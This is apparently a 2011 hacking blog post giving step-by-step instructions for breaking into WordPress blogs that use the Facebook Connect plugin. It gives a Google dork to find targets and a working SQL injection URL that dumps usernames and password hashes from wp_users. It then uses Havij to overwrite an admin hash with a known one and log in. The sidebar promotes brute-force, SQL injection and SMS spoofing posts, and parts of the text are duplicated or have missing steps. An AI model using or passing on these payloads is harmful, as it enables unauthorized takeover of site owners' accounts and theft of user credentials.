Posted by Hacker Pilu
Tuesday, August 09, 2011
0
There is so many bloggers using Facebook Connect Wordpress plugin for their blogs. They think it's cool. But it could be a Big Security hole. Here's the way to hack these sites.
Step 1 :
http://www.google.com
Step 2:Now enter this dork to find sites with security hole..
inurl:"fbconnect_action=myhome"
You will find something like that. |
Step 4: Now replace
?fbconnect_action=myhome&userid=
with this
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 5: Now you have the User name and Password.
Step 6: The password is encrypted with Wordpress md5 (blowfish). You need to decode this. Download and run this software to decode this type of password.
Step 7: Then find the administrator panel out. Normally it should be in
Note: Decoding this type of password may take a big time.
So you here is another way to hack the password.....
Step 1: Open Havij and paste the blog url you are going to hack..
Example:
Step 2: Now find Databases, Tables.
Step 3: Select wp-users then find tick on all columns. Then click on Get Data.
Step 4: You will find something like that..
Step 5: Now select any user and change the user_pass to
Step 6: Now login with the password hackintruths
If you got any problem comment here, We will try our best to solve that.
Step 6: The password is encrypted with Wordpress md5 (blowfish). You need to decode this. Download and run this software to decode this type of password.
Step 7: Then find the administrator panel out. Normally it should be in
www.victrimsite.com/wp-admin
or
www.victrimsite.com/wp-login.php
Note: Decoding this type of password may take a big time.
So you here is another way to hack the password.....
Step 1: Open Havij and paste the blog url you are going to hack..
Example:
http://www.victrimsite.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 2: Now find Databases, Tables.
Step 3: Select wp-users then find tick on all columns. Then click on Get Data.
Step 4: You will find something like that..
Step 5: Now select any user and change the user_pass to
$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/
Step 6: Now login with the password hackintruths
If you got any problem comment here, We will try our best to solve that.
Hacker Pilu
This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
Subscribe to:
Post Comments (Atom)
Popular Posts
-
Hack YAHOO ids by Brute Force AttackToday i will show you how to hack yahoo ids by brute force attack.. Step 1: Download Brutus Force from Here and Extract it on desk...
-
WEAKERTHAN - Another OS For HackersWeakerthan 3.6 OS for Hackers Most of the hackers would have heard about Backtrack. Weakerthan is another Linux based pentesting...
-
Google Parent Directory Ultimate wayLook for Appz in Parent Directory intext:"parent directory" intext:"[EXE]" intext:"parent directory...
-
Microsoft Encarta Encyclopedia PremiumMicrosoft Encarta Encyclopedia Premium Full ISO Want to watch wildlife? Explore Mars? Travel the globe from the comfort of ...
-
Hack / Bypass .asp sites using SQL InjectionHack any .asp sites with SQL Injection attack. 1st, Open Google and search for adminlogin.asp or admin\login.asp 2nd, Open any searc...
-
Get upto 2gb Graphics Memory without any SoftwareGet upto 2gb Graphics memory Just do this steps and you will get upto 2 gb graphics memory. Run >> regedit.exe >> find H...
-
Extract the contents of a .msi executable setup fileSetup executable files are o f many types among which there are two famous types, . msi and . exe files. Both the setup files are self ...
-
Get upto 100 MBPS Internet speed [Funny Trick]Today I will show you how to Fool your friends. They should think that you have internet connection up to 100 MBPS speed. 1 st ,...
-
New sms spoofer across 100 countriesSimply visit and register here ! Then start sending sms to any one with any number www.smsian.info
Labels
- addone
- antivirus
- avast
- avira
- backup
- blog
- Blogger
- broadcasting
- bruteforce
- bsnl
- captcha
- Docomo
- Download
- email hacking
- excel
- Facebook App
- firefox
- freebies
- Game
- game maker
- gmail
- Google+
- Hack
- Help Desk Answer
- Internet
- iso
- Legit or Scam
- license
- Mobile
- mozila
- News
- Official Notices
- Orkut
- rapidshare
- Relaince
- Review
- security
- shell
- Software
- speed up
- SQL Attack
- Tips and Tricks
- Tools
- USB
- virus
- Wallpapers
- WebHack
- win rar
- Windows
- windows 7
- Windows XP
- wordpress
- yahoo
- Zip
No comments: